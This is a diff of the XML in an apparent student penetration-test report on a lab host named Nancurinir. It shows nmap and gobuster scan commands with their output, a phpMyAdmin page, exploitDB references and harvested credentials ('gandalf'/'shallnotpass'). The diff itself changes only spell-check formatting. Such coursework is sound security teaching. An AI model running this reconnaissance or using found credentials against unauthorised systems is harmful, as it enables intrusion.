--- a/SEC-335/pentest_reports/Oliver Mustoe -- Nancurinir Pentest report.docx
+++ b/SEC-335/pentest_reports/Oliver Mustoe -- Nancurinir Pentest report.docx
@@ -1001,7 +1001,17 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>┌──(champuser</w:t>
+        <w:t>┌──(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>champuser</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1019,7 +1029,17 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>kali)-[</w:t>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)-[</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1058,7 +1078,47 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>└─$ sudo nmap 10.0.5.28 -A</w:t>
+        <w:t xml:space="preserve">└─$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 10.0.5.28 -A</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1142,7 +1202,27 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>Not shown: 999 filtered tcp ports (no-response)</w:t>
+        <w:t xml:space="preserve">Not shown: 999 filtered </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ports (no-response)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1184,7 +1264,27 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))</w:t>
+        <w:t>80/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> open  http    Apache httpd 2.4.52 ((Ubuntu))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1247,7 +1347,27 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</w:t>
+        <w:t xml:space="preserve">Warning: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>OSScan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> results may be unreliable because we could not find at least 1 open and 1 closed port</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1310,7 +1430,47 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5</w:t>
+        <w:t xml:space="preserve">OS CPE: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>cpe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">:/o:linux:linux_kernel:4 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>cpe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:/o:linux:linux_kernel:5</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1406,7 +1566,27 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>1   1.80 ms 10.0.5.28</w:t>
+        <w:t xml:space="preserve">1   1.80 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>ms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 10.0.5.28</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1467,28 +1647,46 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Result of gobuster:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>┌──(champuser</w:t>
+        <w:t xml:space="preserve">Result of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>┌──(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>champuser</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1506,7 +1704,17 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>kali)-[</w:t>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)-[</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1545,7 +1753,107 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>└─$ sudo gobuster dir -e -u http://10.0.5.28/ -w /usr/share/wordlists/dirb/common.txt</w:t>
+        <w:t xml:space="preserve">└─$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>dir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -e -u http://10.0.5.28/ -w /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>/share/wordlists/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>/common.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1582,35 +1890,66 @@
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Gobuster v3.3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> v3.3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">by OJ Reeves (@TheColonial) &amp; Christian </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Mehlmauer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (@firefart)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1789,7 +2128,47 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>] Wordlist:                /usr/share/wordlists/dirb/common.txt</w:t>
+        <w:t>] Wordlist:                /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>/share/wordlists/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>/common.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1867,7 +2246,27 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>] User Agent:              gobuster/3.3</w:t>
+        <w:t>] User Agent:              </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>/3.3</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1989,7 +2388,27 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>2022/11/19 15:22:19 Starting gobuster in directory enumeration mode</w:t>
+        <w:t xml:space="preserve">2022/11/19 15:22:19 Starting </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in directory enumeration mode</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2306,7 +2725,17 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>┌──(champuser</w:t>
+        <w:t>┌──(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>champuser</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2324,7 +2753,17 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>kali)-[~]</w:t>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)-[~]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2642,7 +3081,47 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>Gandalf is a legendary wizard of Middle-earth! His preferred weapons are his wizard staff, glamdring, and narya!</w:t>
+        <w:t xml:space="preserve">Gandalf is a legendary wizard of Middle-earth! His preferred weapons are his wizard staff, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>glamdring</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>narya</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>!</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2713,6 +3192,7 @@
         </w:rPr>
         <w:t>&lt;</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
@@ -2722,6 +3202,7 @@
         </w:rPr>
         <w:t>img</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
@@ -2731,6 +3212,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
@@ -2740,6 +3222,7 @@
         </w:rPr>
         <w:t>src</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
@@ -2792,7 +3275,27 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>"shallnotpass"</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>shallnotpass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2939,7 +3442,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Screenshot of “phpMyAdmin/index.php”</w:t>
+        <w:t>Screenshot of “phpMyAdmin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3051,9 +3562,11 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>gandalf</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3061,9 +3574,11 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>shallnotpass</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3157,11 +3672,19 @@
         <w:t xml:space="preserve"> | </w:t>
       </w:r>
       <w:hyperlink r:id="rId13" w:history="1">
+        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">exploitDB </w:t>
+          <w:t>exploitDB</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
         </w:r>
